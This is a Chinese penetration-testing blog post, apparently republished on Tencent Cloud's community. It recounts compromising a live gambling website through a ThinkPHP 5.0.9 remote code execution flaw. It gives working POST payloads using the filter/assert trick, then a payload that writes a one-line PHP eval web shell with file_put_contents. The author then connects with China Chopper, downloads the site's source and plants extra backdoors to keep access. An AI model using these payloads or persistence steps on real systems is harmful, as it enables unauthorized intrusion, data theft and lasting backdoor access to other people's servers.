前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >简单的BC站点getshell

简单的BC站点getshell

作者头像
天钧
发布2021-03-22 10:56:57
1.3K0
发布2021-03-22 10:56:57
举报
文章被收录于专栏:渗透云笔记渗透云笔记

最近来了点任务,做BC站,以前没做过只能碰碰运气!

确定目标 主站:

通过旁站:

信息收集 通过信息收集发现是个tp v5.0.9,此版本存在tp-rce漏洞。

直接通过payload进行测试,

Post:_method=__construct&filter[]=assert&method=get&get[]=phpinfo()

查找payload,直接打:

Post:_method=__construct&filter[]=assert&method=get&get[]=phpinfo()

发现是php 5.4.45版本的,

直接尝试getshell:

发现system被禁用,尝试其他系统命令的也一样。

查看phpinfo中desable_functions禁用了那些函数。

想办法怎么绕过进行写马(此处卡了我半天) 最后通过一位渗透小伙伴,想出下面的可以利用file_put_contents直接写shell,想了半天,忘了用其他函数进行直接写马就可以了,并不需要非得利用system命令进行写马,还是底层知识薄弱啊。再次感谢小伙伴!

getshell 构造payload:

_method=__construct&filter[]=assert&method=get&get[]=file_put_contents('a.php','<?php eval($_POST[a])?>')

写入成功,利用菜刀连接。

成功连接。 查看权限:

发现启动了远程安全模式。 想要绕过,发现很多函数被禁用,占未成功。 下载源码:

多部署一些后门,防止被删。

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2021-03-16,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 渗透云笔记 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档